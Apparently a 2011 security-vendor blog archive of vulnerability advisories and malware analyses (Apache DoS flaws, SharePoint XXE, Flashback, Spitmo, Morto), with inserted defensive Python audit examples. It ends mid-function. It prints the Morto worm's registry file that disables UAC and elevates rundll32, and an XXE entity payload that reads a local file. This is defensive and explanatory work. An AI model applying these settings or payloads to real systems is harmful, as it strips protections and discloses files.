Apache HTTPD mod_proxy_ajp DoS (Sep 30, 2011)

The Apache HTTP server is the most popular web server used on the Internet. The server comes bundled with optional plug-in modules which are loaded at run-time to extend its functionality. Two technologies supported by the Apache HTTP server are the Apache JServ Protocol (AJP) and httpd based load balancing.

AJP is a binary protocol which routes requests from a web server to application servers. This is done by using a routing scheme where each application server is given a name, known as its ‘route’. This setup is usually used in high demand environments where clusters of servers are implemented. It is implemented through the module mod_proxy_ajp. Although load balancing can be performed with this protocol, the module mod_cluster can be used in addition to mod_proxy_ajp to provide additional load balancing capabilities. While mod_proxy_ajp creates channels between the web servers and the application servers, mod_cluster creates channels between the application servers and the web server to provide more detailed information about the server state. This allows the proxy to dynamically configure httpd workers based on the application server environment.

Typically, an HTTP request is received by the web server, which then forwards it to the appropriate backend server based on the load balancer’s information. HTTP requests consist of a request line and various headers. The Request-Line begins with a method token, followed by the Request-URI, the protocol version, and CRLF. An example of an HTTP request line, followed by a Host header, is shown below:

    GET /test.html HTTP/1.1
    Host: www.test.com

A denial of service vulnerability exists in the mod_proxy_ajp module. The vulnerability is due to insufficient validation of HTTP requests. The vulnerable code does not properly handle some HTTP methods. When a malicious request is processed by the code, it returns an HTTP_INTERNAL_SERVER_ERROR which puts the proxy workers into an error state. At this point, the workers are unable to accept any connections, resulting in a denial of service condition. An unauthenticated, remote attacker can exploit this vulnerability by sending an HTTP request with an invalid method. Exploitation of this flaw results in a temporary denial of service condition.
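The flaw above comes down to a request whose method the module cannot handle being passed through to the backend. The following is an added example, not code from the page or from the Apache project: a small Request-Line checker of the kind a front-end proxy or a log scanner can run, which rejects malformed lines outright and flags method tokens that are not on an allow-list. The allow-list (FORWARDED_METHODS) and the sample lines are assumptions constructed for the example.

```python
import re

# RFC 2616 "token": one or more characters that are neither CTLs nor
# separators. A method that is not a token cannot be legitimate whatever it
# is called, so it is rejected before any allow-list lookup.
_TOKEN_RE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
_VERSION_RE = re.compile(r"^HTTP/\d+\.\d+$")

# Methods this front end is willing to forward to the AJP backend. The set is
# an assumption of this example; derive it from what the application serves.
FORWARDED_METHODS = frozenset({
    "GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE",
})


def check_request_line(line):
    """Classify one HTTP Request-Line ("METHOD SP Request-URI SP HTTP-Version").

    Returns (verdict, method) where verdict is
      "ok"             well-formed and the method is on the forward list
      "unknown-method" well-formed token, but not a method we forward
      "malformed"      not three space-separated parts, bad token or bad version
    """
    parts = line.rstrip("\r\n").split(" ")
    if len(parts) != 3:
        return "malformed", None
    method, target, version = parts
    if not _TOKEN_RE.match(method):
        return "malformed", method
    if not target or not _VERSION_RE.match(version):
        return "malformed", method
    if method not in FORWARDED_METHODS:   # method names are case-sensitive
        return "unknown-method", method
    return "ok", method


def scan_request_lines(lines):
    """Return the lines a front end should answer itself (400 or 501) instead
    of forwarding, as (verdict, method, line) tuples."""
    rejected = []
    for line in lines:
        verdict, method = check_request_line(line)
        if verdict != "ok":
            rejected.append((verdict, method, line))
    return rejected


# Constructed sample request lines for this example.
SAMPLE_LINES = [
    "GET /test.html HTTP/1.1",
    "POST /app/login HTTP/1.1",
    "FOOBAR /test.html HTTP/1.1",        # valid token, not a method we forward
    "GET /test.html HTTP/1.1 extra",     # not three parts
    "GE(T /test.html HTTP/1.1",          # '(' is a separator, not a token char
    "GET /test.html HTTPS/1.1",          # bad protocol version
]

if __name__ == "__main__":
    for verdict, method, line in scan_request_lines(SAMPLE_LINES):
        print(f"{verdict:15} {method!r:10} {line}")
```

The point of answering such requests at the front end is that a backend error state (the HTTP_INTERNAL_SERVER_ERROR path described above) is never reached for input that could have been refused on syntax alone.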

SonicWALL has released two IPS signatures to address this issue. The following signatures have been released:

  • 2063 – Apache mod_proxy_ajp DoS 2
  • 2065 – Apache mod_proxy_ajp DoS 2

This vulnerability has been assigned the ID CVE-2011-3348 by MITRE.
The vendor has released an advisory addressing this flaw.

MAC OSX Flashback Backdoor Trojan (Sep 29, 2011)

SonicWALL UTM Research team received reports of a new MAC OSX Flashback Trojan spreading in the wild by masquerading as an Adobe Flash Player 11 installer. Once installed, it proceeds to install a backdoor on the system, contacts a remote server to report the infection and awaits further instructions.

The fake installer is automatically executed when downloaded through Safari. The user is then led through the following installation screens:

screenshot

screenshot

It performs the following activities when installed:

  • It drops the following files:
    • ~/Library/Preferences/Preferences.dylib
    • ~/.MacOSX/environment.plist
    • /tmp/AdobeUpdate/FlashPlayer.txt
  • The preinstall script removes the downloaded “FlashPlayer-11-macos.pkg” file once installation is completed.
  • It checks for presence of “Little Snitch” security software by querying for “/Library/Little Snitch/lsd” and disables it.
  • It modifies the “DYLD_INSERT_LIBRARIES” environment variable for “launchd” to point to “~/Library/Preferences/Preferences.dylib”. This ensures malicious Preferences.dylib is loaded when certain applications/daemons are launched.
  • It reports infection to remote server.
      screenshot
  • The user agent used when reporting to the remote server is a combination of the kernel variables “hw.machine” and “kern.osrelease” read from the infected system.
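The persistence mechanism listed above (DYLD_INSERT_LIBRARIES in the per-user ~/.MacOSX/environment.plist pointing at the dropped Preferences.dylib) is something a host check can look for directly. The following is an added example, not code from the page or from the original analysis: it parses an environment.plist with Python's standard plistlib and reports any DYLD_INSERT_LIBRARIES entry, with a specific match for the dropped library; the sample plist is constructed for the example and the /Users/victim path in it is a placeholder.

```python
import os
import plistlib

# File names reported for this sample, relative to the user's home directory.
ENVIRONMENT_PLIST = ".MacOSX/environment.plist"
DROPPED_LIBRARY = "Library/Preferences/Preferences.dylib"


def audit_environment_plist(plist_bytes):
    """Inspect the contents of an environment.plist and return findings.

    Any DYLD_INSERT_LIBRARIES entry is reported, since a per-user launchd
    environment has little legitimate need for one; an entry naming the
    dropped Preferences.dylib is reported as a match for this Trojan.
    """
    findings = []
    try:
        env = plistlib.loads(plist_bytes)
    except plistlib.InvalidFileException:
        return ["environment.plist is not a valid property list"]
    if not isinstance(env, dict):
        return ["environment.plist top level is not a dictionary"]
    value = env.get("DYLD_INSERT_LIBRARIES")
    if value is None:
        return findings
    findings.append(f"DYLD_INSERT_LIBRARIES is set: {value!r}")
    # DYLD_INSERT_LIBRARIES holds a colon-separated list of dylib paths.
    for lib in str(value).split(":"):
        if lib.endswith("/" + DROPPED_LIBRARY):
            findings.append("entry matches the dropped library: " + lib)
    return findings


def audit_home(home=None):
    """Check a live home directory for the dropped files and the plist entry."""
    home = home or os.path.expanduser("~")
    findings = []
    for rel in (ENVIRONMENT_PLIST, DROPPED_LIBRARY):
        path = os.path.join(home, rel)
        if os.path.exists(path):
            findings.append("present: " + path)
    plist_path = os.path.join(home, ENVIRONMENT_PLIST)
    if os.path.isfile(plist_path):
        with open(plist_path, "rb") as f:
            findings.extend(audit_environment_plist(f.read()))
    return findings


# Constructed sample plist shaped like the one the Trojan writes.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>DYLD_INSERT_LIBRARIES</key>
    <string>/Users/victim/Library/Preferences/Preferences.dylib</string>
</dict>
</plist>
"""

if __name__ == "__main__":
    for finding in audit_environment_plist(SAMPLE_PLIST):
        print(finding)
```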

We advise users to only download software from trusted sources. We also recommend disabling the “Open safe files after downloading” feature in Safari, which will prevent this Trojan installer from launching automatically on download. This feature can be unchecked in Safari->Preferences->General:

screenshot

SonicWALL Gateway AntiVirus provides protection against this threat with the following signature:

  • GAV: OSX.Flashback.A (Trojan)

Microsoft SharePoint XML File Disclosure (Sept 23, 2011)

    Microsoft SharePoint Server is an ASP.NET product intended for collaboration, file sharing, web publishing and other social networking functions. The server runs on the Microsoft IIS web server. SharePoint farms host web sites, intranets, extranets, as well as provide a framework for web application development. SharePoint also allows creation of ASP.NET controls known as Web Parts or Web Widgets to enhance the functionality of a particular SharePoint page. These controls allow end users to modify various aspects of the web page from their web browser. One of these widgets included in the SharePoint package is the XML Viewer. The XML Viewer has the ability to display and apply XSLT to XML documents. An example SharePoint page is shown which can be added to an XML Viewer widget:

          

    test

    XML defines entities which are symbolic representations of a block of information. Entities can be either external or internal. Internal entities are defined and used inside the XML file. External entities exist in an external source like a file and require the SYSTEM identifier in order to be imported and used. An example of an external entity definition is shown:

      

    In the above example, the external resource identifier is a URI. Most of the time, it’s a simple file name.

    An information disclosure vulnerability exists in Microsoft SharePoint. It is due to an error while parsing XML files which use external entities. The vulnerable code allows a user to specify an arbitrary file and path of the external resource. This can allow a user to create an XML Viewer Web Part which discloses the contents of arbitrary files within the SharePoint server scope. In order to exploit this flaw, an attacker must first be successfully authenticated by the target SharePoint server.
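The defect above is the classic XML external entity problem: a parser that resolves SYSTEM entities turns the entity declaration into a file read. The following is an added example, not SharePoint code and not from the page: it uses Python's standard xml.sax parser to show the same document parsed with external entity resolution enabled (the vulnerable behaviour, reading a constructed temporary file) and disabled (the hardened setting), plus a cheap pre-parse check for DTDs that declare external entities, which is the kind of pattern a network signature can match. The file name and its content are constructed for the example.

```python
import io
import os
import re
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class _TextCollector(ContentHandler):
    """Collect the character data of the document as it is parsed."""

    def __init__(self):
        super().__init__()
        self.text = []

    def characters(self, content):
        self.text.append(content)


def parse_text(xml_bytes, resolve_external_entities):
    """Parse an XML document and return its text content.

    resolve_external_entities=True mimics the vulnerable behaviour: SYSTEM
    entities are fetched from disk and their contents become part of the
    document. False is the hardened setting: the entity reference is skipped
    and contributes nothing.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.text).strip()


def declares_external_entity(xml_bytes):
    """Pre-parse check: does the internal DTD subset declare an entity with a
    SYSTEM or PUBLIC identifier? Cheap enough to run on traffic before the
    document ever reaches a parser."""
    head = xml_bytes[:4096].decode("utf-8", "replace")
    if "<!DOCTYPE" not in head or "<!ENTITY" not in head:
        return False
    return bool(re.search(r"<!ENTITY\s+\S+\s+(SYSTEM|PUBLIC)\b", head))


def demo():
    """Write a constructed secret file, then parse a document referencing it
    both ways. Returns (flagged, disclosed_text, hardened_text)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("constructed-secret-value")
        secret_path = f.name
    try:
        doc = (
            '<?xml version="1.0"?>\n'
            '<!DOCTYPE root [ <!ENTITY ext SYSTEM "%s"> ]>\n'
            '<root>&ext;</root>\n' % secret_path
        )
        data = doc.encode()
        return (
            declares_external_entity(data),
            parse_text(data, resolve_external_entities=True),
            parse_text(data, resolve_external_entities=False),
        )
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    flagged, disclosed, hardened = demo()
    print("external entity declared:", flagged)
    print("with resolution enabled :", repr(disclosed))
    print("with resolution disabled:", repr(hardened))
```

The hardened call is the one to keep: with feature_external_ges off, the declared entity still parses without error, it just yields no content, so the file named in the DTD is never opened.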

    SonicWALL has released two IPS signatures to address this vulnerability. The signatures detect and block generic attack attempts targeting this flaw.

    • 1856 – SharePoint Remote File Disclosure 1
    • 1003 – SharePoint Remote File Disclosure 2

    The vulnerability has been assigned CVE-2011-1892 by MITRE.
    The vendor has released an advisory (MS11-074) addressing this issue.

    Fake AV spreading via Skype VOIP calls (Sep 20, 2011)

    The SonicWALL UTM research team received reports of an increase in the number of unsolicited Skype calls trying to spread Fake AV.

    Fake AV authors are using Skype VOIP calls to lure unsuspecting users into visiting a Fake AV landing site. We first received reports of this tactic earlier this year, in April 2011, and there has been a rise in these automated calls with prerecorded messages since then. Below is a screenshot of the most recent call received by one of our researchers:

    There is a pre-recorded message that loops multiple times before the call ends:

      Attention: This is an automated computer system alert.
      Your computer protection service is not active.
      To activate computer protection, and repair your computer, go to www.sos(REMOVED).com

    If the user opens the website, they will see the usual Fake AV scare-ware animations claiming to scan the computer and find multiple threats:

    It finally prompts the user to buy the protection service to fix the errors:

    They are using Click2Sell.eu, a European affiliate marketing company, as the payment gateway. This is an interesting new scare-ware tactic where Fake AV authors are:

    • Using Skype VOIP calls to spread.
    • Luring users straight to the payment gateway for computer protection without downloading any scare-ware onto the user system and hence bypassing AV file detection.
    • Instead of the traditional one-time payment for the Fake AV, they are making the user sign up for a monthly subscription of 19.95 USD.

    In order to avoid such scam tactics, Skype users are advised to change their Privacy settings for calls to only allow calls from their contacts:

    Additionally, SonicWALL customers can use the Application Control service to prevent this threat by blocking Skype calls on their network.

    Microsoft Security Bulletins Coverage (Sept 13, 2011)

    SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of September, 2011. A list of issues reported, along with SonicWALL coverage information follows:

    MS11-070 Vulnerability in WINS Could Allow Elevation of Privilege (2571621)

    • CVE-2011-1984 WINS Local Elevation of Privilege Vulnerability
      Local vulnerability.

    MS11-071 Vulnerability in Windows Components Could Allow Remote Code Execution (2570947)

    • CVE-2011-1991 Windows Components Insecure Library Loading Vulnerability
      IPS: 5726 – Possible Binary Planting Attempt

    MS11-072 Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2587505)

    • CVE-2011-1986 Excel Use after Free WriteAV Vulnerability
      GAV: Malformed.xls.MP.2
    • CVE-2011-1987 Excel Out of Bounds Array Indexing Vulnerability
      GAV: Malformed.xls.MP.3
    • CVE-2011-1988 Excel Heap Corruption Vulnerability
      GAV: Malformed.xls.MP.4, Malformed.xls.MP.5, Malformed.xls.MP.6
    • CVE-2011-1989 Excel Conditional Expression Parsing Vulnerability
      GAV: Malformed.xls.MP.7
    • CVE-2011-1990 Excel Out of Bounds Array Indexing Vulnerability
      GAV: Malformed.xls.MP.8

    MS11-073 Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2587634)

    • CVE-2011-1980 Office Component Insecure Library Loading Vulnerability
      IPS: 5726 Possible Binary Planting Attempt
    • CVE-2011-1982 Office Uninitialized Object Pointer Vulnerability
      GAV: Malformed.doc.MP.3

    MS11-074 Vulnerabilities in Microsoft SharePoint Could Allow Elevation of Privilege (2451858)

    • CVE-2011-0653 XSS in SharePoint Calendar Vulnerability
      IPS: 6753 – Generic Cross-Site Scripting (XSS) Attempt 8
    • CVE-2011-1252 HTML Sanitization Vulnerability
      IPS: 6797 MS IE toStaticHTML XSS 3
    • CVE-2011-1890 Editform Script Injection Vulnerability
      IPS: 1868 Generic Cross-Site Scripting (XSS) Attempt 21
    • CVE-2011-1891 Contact Details Reflected XSS Vulnerability
      IPS: 1849 Generic Cross-Site Scripting (XSS) Attempt 20
    • CVE-2011-1892 SharePoint Remote File Disclosure Vulnerability
      IPS: 1856 SharePoint Remote File Disclosure
    • CVE-2011-1893 SharePoint XSS Vulnerability
      IPS: 1369 Generic Cross-Site Scripting (XSS) Attempt 1, 6752 Generic Cross-Site Scripting (XSS) Attempt 7

    SpyEye targets android devices with Spitmo.A (Sep 13, 2011)

    SonicWALL UTM Research team received reports of a new SpyEye banking Trojan variant targeting the Android platform. This variant uses MitB (Man-in-the-Browser) techniques when the user visits banking websites in order to direct the user to download an Android application. The Android application claims to generate the authentication code required to log in to the banking website, but once installed, it intercepts the user’s messages and uploads them to a remote server in the background.

    When the rogue application is downloaded and the installer is launched, it requests the following permissions:

    screenshot

    It performs the following activities when installed:

    • Once installed, it does not show up in the device’s list of installed applications but runs silently in the background as “System”:
        screenshot
    • It displays a fake authentication code for logging in to the banking website when a call is placed to “325000”:
        screenshot
    • It displays the fake code on the home screen as seen below:
        screenshot
    • It contacts the following domains which are no longer active:
        screenshot
    • The remote URLs are hidden in the “Settings.xml” file of the android application:
        screenshot
    • It intercepts messages and constructs data to be sent to a remote server:
        screenshot

        screenshot
    • It uploads the intercepted messages to a remote server:
        screenshot

    SonicWALL Gateway AntiVirus provides protection against this threat with the following signature:

    • GAV: AndroidOS.Spitmo.A (Trojan)

    New Screen Lock Ransomware poses as Microsoft License Manager (Sept 9, 2011)

    The SonicWALL UTM research team received reports of a new Ransom Malware in the wild. Malware of this nature holds a compromised machine hostage until payment is made. This software pretends to come from Microsoft and claims that the license used on the compromised system is not authentic. As a result, the user is encouraged to buy a “license” from the creators of the Trojan. The user is forced to do this from another machine, as the desktop is locked.

    Upon execution, the Trojan will immediately reboot the system. On reboot, the following screen will be displayed:

    There is no conventional way of exiting the screen other than to follow the malicious instructions for obtaining a license from www.buylicens.com for 50 Euros.

    The following screenshot is from www.buylicens.com and has been partially translated from German to English:

    The Trojan performs the following DNS query:

    • lic{removed}.cz.cc (This site is currently down)

    The Trojan creates the following files on the filesystem:

    • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\msvcs.exe [Detected as GAV: Ransom.A_2 (Trojan)] (This is a copy of the original executable that was run)

    The Trojan creates the following keys in the Windows registry:

      Enable startup:

    • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “C:\Documents and Settings\{USER}\Application Data\9A52917-B4FC-4f02-AE3B-BF55D9351F4A\msvcs.exe”
    • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon “C:\WINDOWS\system32\userinit.exe,C:\Documents and Settings\{USER}\Application Data\9A52917-B4FC-4f02-AE3B-BF55D9351F4A\msvcs.exe”
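Both registry entries above are logon-time autostart points: the Run key launches the copy in Application Data, and the Winlogon Userinit value has the same path appended after the genuine userinit.exe. The following is an added example, not code from the page or from the analysis: a Python audit of those two values that reports any Userinit entry other than userinit.exe and any Run-key command whose program lives under a user-profile directory. The sample values are constructed from the paths listed in this entry, with {USER} kept as a placeholder, and the list of profile directory names is an assumption of the example.

```python
import ntpath

# Directory names that mark a user-profile location (Windows XP-era layout,
# matching the paths in this entry). Assumption of this example.
PROFILE_DIRS = {"application data", "appdata", "startup", "temp", "local settings"}


def _norm(path):
    """Normalise a Windows path for comparison: strip quotes and spaces,
    collapse separators, lower-case. ntpath works on any host OS."""
    return ntpath.normpath(path.strip().strip('"')).lower()


def userinit_extras(value):
    """Return the entries of a Winlogon Userinit value other than the genuine
    userinit.exe. Winlogon starts every comma-separated entry at logon, so any
    extra entry is a persistence point (the Trojan appends msvcs.exe)."""
    extras = []
    for entry in value.split(","):
        if not entry.strip():
            continue
        norm = _norm(entry)
        if norm == "userinit.exe" or norm.endswith("\\system32\\userinit.exe"):
            continue
        extras.append(entry.strip())
    return extras


def executable_of(command):
    """Pull the program path out of a Run-key command line, quoted or not."""
    cmd = command.strip()
    if cmd.startswith('"'):
        return cmd[1:].split('"', 1)[0]
    i = cmd.lower().find(".exe")
    return cmd[:i + 4] if i >= 0 else cmd.split(" ", 1)[0]


def suspicious_run_entry(command):
    """Flag a Run-key value whose program lives in a user-profile directory
    rather than under Program Files or the Windows directory."""
    parts = _norm(executable_of(command)).split("\\")
    return any(p in PROFILE_DIRS for p in parts)


def audit_logon_persistence(userinit_value, run_values):
    """Combine both checks into a list of human-readable findings."""
    findings = ["Userinit has extra entry: " + e
                for e in userinit_extras(userinit_value)]
    findings += ["Run value starts program from user profile: " + v
                 for v in run_values if suspicious_run_entry(v)]
    return findings


# Constructed from the registry data listed above ({USER} is a placeholder).
SAMPLE_USERINIT = (r"C:\WINDOWS\system32\userinit.exe,"
                   r"C:\Documents and Settings\{USER}\Application Data"
                   r"\9A52917-B4FC-4f02-AE3B-BF55D9351F4A\msvcs.exe")
SAMPLE_RUN = (r'"C:\Documents and Settings\{USER}\Application Data'
              r'\9A52917-B4FC-4f02-AE3B-BF55D9351F4A\msvcs.exe"')

if __name__ == "__main__":
    for finding in audit_logon_persistence(SAMPLE_USERINIT, [SAMPLE_RUN]):
        print(finding)
```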

    The Trojan injects code into a Firefox browser process. If Firefox is not present on the system it falls back to using Internet Explorer. It causes the following network conversation with a remote host:

    During analysis it was discovered that the Trojan executable file contains the unlock key (QRT5T 5FJQE 53BGX T9HHJ W53YT) in plain text. This key appears to remove the Trojan:

    SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

    • GAV: Ransom.A_2 (Trojan)

    Broadwin WebAccess Client Format String Attack (Sept 8, 2011)

    Supervisory Control and Data Acquisition (SCADA) generally refers to industrial control systems: computer systems that monitor and control industrial, infrastructure, or facility-based processes. A SCADA system usually consists of the following subsystems: a human-machine interface (HMI), a supervisory (computer) system, remote terminal units (RTUs) connecting to sensors in the process, programmable logic controllers (PLCs) used as field devices, and communication infrastructure. Broadwin Technology is one of the vendors that manufacture SCADA systems. Browser-based Human-Machine Interface (HMI) and Supervisory Control and Data Acquisition (SCADA) software are two of their main products.

    Broadwin’s WebAccess is the client component of their SCADA system. It provides an ActiveX component designed to run in an Internet Explorer (IE) session. The ActiveX control is associated with CLSID “5C2A52BD-2250-4F6B-A4D2-D1D00FCD748C” and ProgID “BWOCXRUN.BwocxrunCtrl.1”. It can be instantiated in a web page using an object tag or via scripting. The following example demonstrates how this ActiveX control can be instantiated:

    
    

    A format string code execution vulnerability exists in Broadwin Technology’s WebAccess client ActiveX component bwocxrun.ocx. The vulnerability is due to insufficient input validation when handling one of the parameters in calls to the BWOCXRUN.BwocxrunCtrl.1 method. A remote, unauthenticated attacker can exploit this vulnerability by enticing a target client to view a crafted HTML document, ASP page, or various other media. Successful exploitation could result in execution of arbitrary code within the security context of the target user.

    SonicWALL UTM team has researched this vulnerability and created the following IPS signature to detect and prevent attacks targeting it:

    • 1801 Broadwin WebAccess Client Format String Attack

    This vulnerability has not been assigned a CVE ID.

    Apache Range Header Processing DoS (Sep 1, 2011)

    The Apache HTTP server is the most popular HTTP server software in use. It supports a variety of features, many implemented as compiled modules which extend the core functionality.

    The Range header in HTTP/1.1 is used to request part of an entity; it improves efficiency when recovering from failed or incomplete transfers. The Range header may specify a single range of bytes, or a set of ranges within a single entity.

    A memory exhaustion vulnerability exists in Apache HTTP Server. Specifically, the vulnerability happens when processing a Range header that expresses multiple overlapping ranges. A remote attacker could exploit this vulnerability by sending a series of crafted HTTP requests to the target server. Successful exploitation would exhaust available memory of the target server and cause a denial-of-service condition.
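The trigger described above is a Range header carrying many overlapping byte ranges, so the natural front-end defence is to parse the header and refuse to serve range sets that are too numerous or overlap. The following is an added example, not code from the page or from the Apache project: a parser for the HTTP/1.1 byte-range syntax (including suffix ranges such as -500 and open-ended ranges such as 500-) and an assessment function built on it. The cap of five ranges and the overlap rule are this example's own policy, and the sample headers are constructed.

```python
import re

_RANGE_SPEC = re.compile(r"^(\d*)-(\d*)$")


def parse_byte_ranges(header_value, entity_length):
    """Parse a Range header value ("bytes=0-99,200-,-50") into a list of
    (first, last) absolute byte positions for an entity of entity_length
    bytes. Raises ValueError when the header is syntactically invalid, in
    which case HTTP/1.1 says the header must be ignored."""
    if not header_value.lower().startswith("bytes="):
        raise ValueError("only the bytes range unit is supported")
    ranges = []
    for spec in header_value[len("bytes="):].split(","):
        spec = spec.strip()
        if not spec:
            continue
        m = _RANGE_SPEC.match(spec)
        if not m or not (m.group(1) or m.group(2)):
            raise ValueError("invalid byte-range-spec: %r" % spec)
        first, last = m.group(1), m.group(2)
        if first == "":
            # suffix-byte-range-spec: the final N bytes of the entity
            n = int(last)
            if n == 0:
                continue                     # unsatisfiable, skipped
            ranges.append((max(0, entity_length - n), entity_length - 1))
            continue
        f = int(first)
        if last == "":
            l = entity_length - 1            # open-ended: to end of entity
        else:
            l = int(last)
            if l < f:
                raise ValueError("last-byte-pos precedes first-byte-pos: %r" % spec)
        if f >= entity_length:
            continue                         # unsatisfiable, skipped
        ranges.append((f, min(l, entity_length - 1)))
    return ranges


def assess_range_header(header_value, entity_length, max_ranges=5):
    """Return (range_count, overlapping, verdict).

    "ok"            serve the ranges as requested
    "ignore-range"  header is invalid; serve the full entity as the RFC says
    "reject"        too many ranges or overlapping ranges (this example's
                    policy for the memory-exhaustion pattern above)
    """
    try:
        ranges = parse_byte_ranges(header_value, entity_length)
    except ValueError:
        return 0, False, "ignore-range"
    ordered = sorted(ranges)
    overlapping = any(ordered[i][1] >= ordered[i + 1][0]
                      for i in range(len(ordered) - 1))
    if len(ranges) > max_ranges or overlapping:
        return len(ranges), overlapping, "reject"
    return len(ranges), overlapping, "ok"


# Constructed headers: a normal resume request, and one asking for the whole
# entity plus thirty overlapping windows, the shape the entry describes.
NORMAL_RANGE = "bytes=500-999"
OVERLAPPING_RANGE = "bytes=0-," + ",".join("%d-%d" % (i, i + 20) for i in range(1, 31))

if __name__ == "__main__":
    for header in (NORMAL_RANGE, OVERLAPPING_RANGE):
        print(header[:40], "->", assess_range_header(header, entity_length=2000))
```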

    The vulnerability has been assigned CVE-2011-3192.

    SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

    • 6905 Apache HTTP Range Header DOS Attempt

    RDP Worm Morto.A (Aug. 31, 2011)

    SonicWALL UTM Research team received reports of a new Internet worm propagating in the wild. This worm targets Remote Desktop Protocol (RDP) and has the capability to download additional malicious components, terminate antivirus-related security processes and services, perform Denial-of-Service (DDoS) attacks, and be remotely controlled from a malicious server.

    Process of Infection:

    This worm targets machines via Remote Desktop Protocol (RDP) by compromising weak administrator passwords. Once a system is infected, it will scan the local network for RDP connections through port 3389. It uses a set of usernames and passwords to gain access to these RDP machines and infects them.

    Installation:

    This worm has three components: Main executable, DLL loader, and the payload.

    Main Executable

    The main executable drops the DLL loader ntshrui.dll into the %windir%/temp directory and copies it as clb.dll into the %windir% directory.

    It adds the following registry entries as part of its installation:

    • HKLM\SYSTEM\Wpa\it
    • HKLM\SYSTEM\Wpa\id
    • HKLM\SYSTEM\Wpa\ie
    • HKLM\SYSTEM\Wpa\sr
    • HKLM\SYSTEM\Wpa\sn
    • HKLM\SYSTEM\Wpa\md

    It then deletes the following registry key to remove its tracks:

    • HKCU “Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU”

    The DLL loader clb.dll located at %windir% directory is loaded once the malware spawns the process Registry Editor (regedit.exe).

    There is a legitimate DLL file clb.dll located in the %windir%/system32 directory that regedit.exe actually uses. But because of the way Windows searches for DLLs, looking in the %windir% directory before %windir%/system32, the malware component clb.dll will in effect be loaded instead of the legitimate one.

    DLL Loader

    After being loaded by the regedit process, it decrypts the payload DLL and loads it into memory. It also performs the following activities:

      Added Registry:

      Key: HKLM\SYSTEM\CurrentControlSet\Control\Windows
      Value: “NoPopUpsOnBoot”
      Data: “1”

      Key: HKLM\SYSTEM\CurrentControlSet\Services\6to4\Parameters
      Value: “ServiceDll”
      Data: “%windir%\temp\ntshrui.dll”

      Modified Registry:

      Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS\Parameters
      Value: ServiceDll
      Data Before: %SystemRoot%\system32\sens.dll
      Data After: %SystemRoot%\system32\sens32.dll

      Added Files:

      %windir%\offline web pages\{Current Date}
      %windir%\offline web pages\1.40_testDdos
      %windir%\offline web pages\cache.txt – blocked as [ GAV: Morto.A_2 (Trojan) ]
      %windir%\system32\sens32.dll – blocked as [ GAV: Morto.A_2 (Trojan) ]

    DLL Payload

    The malware attempts to connect to RDP servers on local network through port 3389 using administrator accounts. Some of the accounts are shown below:

    screenshot

    It will copy the following files onto the RDP workstations through the \\tsclient\a share:

    • \\tsclient\a\a.dll – blocked as [ GAV: Morto.A_2 (Trojan) ]
    • \\tsclient\a\r.reg

    The contents of the file r.reg are shown below. They ensure that rundll32.exe will run the malware with administrator privileges, without prompting the user for permission for any system changes:

      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
      "ConsentPromptBehaviorAdmin"=dword:0
      "EnableLUA"=dword:0

      [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CuurrentVersion\AppCompatFlags\Layers]
      "c:\windows\system32\rundll32.exe"="RUNASADMIN"
      "d:\windows\system32\rundll32.exe"="RUNASADMIN"
      "e:\windows\system32\rundll32.exe"="RUNASADMIN"
      "f:\windows\system32\rundll32.exe"="RUNASADMIN"
      "g:\windows\system32\rundll32.exe"="RUNASADMIN"
      "h:\windows\system32\rundll32.exe"="RUNASADMIN"
      "i:\windows\system32\rundll32.exe"="RUNASADMIN"

      "c:\windows\SysWOW64\rundll32.exe"="RUNASADMIN"
      "d:\windows\SysWOW64\rundll32.exe"="RUNASADMIN"
      "e:\windows\SysWOW64\rundll32.exe"="RUNASADMIN"
      "f:\windows\SysWOW64\rundll32.exe"="RUNASADMIN"
      "g:\windows\SysWOW64\rundll32.exe"="RUNASADMIN"
      "h:\windows\SysWOW64\rundll32.exe"="RUNASADMIN"
      "i:\windows\SysWOW64\rundll32.exe"="RUNASADMIN"

      "c:\winnt\system32\rundll32.exe"="RUNASADMIN"
      "c:\win2008\system32\rundll32.exe"="RUNASADMIN"
      "c:\win2k8\system32\rundll32.exe"="RUNASADMIN"
      "c:\win7\system32\rundll32.exe"="RUNASADMIN"
      "c:\windows7\system32\rundll32.exe"="RUNASADMIN"
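The r.reg file above does two things: it turns UAC off (EnableLUA and ConsentPromptBehaviorAdmin set to 0) and it gives rundll32.exe a RUNASADMIN compatibility layer on every drive letter it can think of. The following is an added example, not code from the page or from the analysis: a parser for the small subset of .reg syntax used here and an audit that reports exactly those two changes, so a file collected from a share or an endpoint can be triaged without importing it. The sample file is a constructed, shortened version of r.reg with doubled backslashes as the .reg format requires.

```python
import re

_SYSTEM_POLICY_SUFFIX = r"\microsoft\windows\currentversion\policies\system"
_LAYERS_SUFFIX = r"\appcompatflags\layers"


def parse_reg(text):
    """Parse the subset of .reg syntax used here: [key] sections followed by
    "name"=dword:HEX or "name"="string" lines. Returns {key: {name: value}}
    with keys lower-cased, dword data converted to int and the doubled
    backslashes of .reg string syntax collapsed."""
    result = {}
    current = None
    for raw in text.splitlines():
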